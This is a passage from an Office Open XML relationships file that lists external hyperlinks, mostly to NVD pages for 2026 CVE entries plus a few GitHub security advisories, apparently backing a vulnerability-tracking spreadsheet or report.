Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74235" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75125" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75126" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75135" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75136" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75137" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75592" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77217" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77218" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79743" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81531" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81823" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83492" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84201" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84478" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84481" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84483" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85149" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85156" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85242" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85609" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85621" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85662" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86188" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86194" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86206" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86252" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86810" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8712" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-3mcp-22mf-vrw3" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mxjf-vfmv-qfm6" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37268" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15647" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72703" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72704" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72705" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72714" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74853" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74859" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75616" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76226" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76227" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76845" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82846" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83544" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84021" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84022" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84028" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84221" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84896" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84899" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84930" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84931" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84937" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85456" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-486p-g8x4-77mg" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5522" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72927" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45819" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52486" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84898" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14975" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17259" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17509" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18021" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18078" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18887" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19299" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19301" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19302" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19859" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37009" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38345" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52763" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53637" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55256" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55545" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55549" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55855" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62437" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67624" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67629" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67630" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69562" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69855" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71510" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" 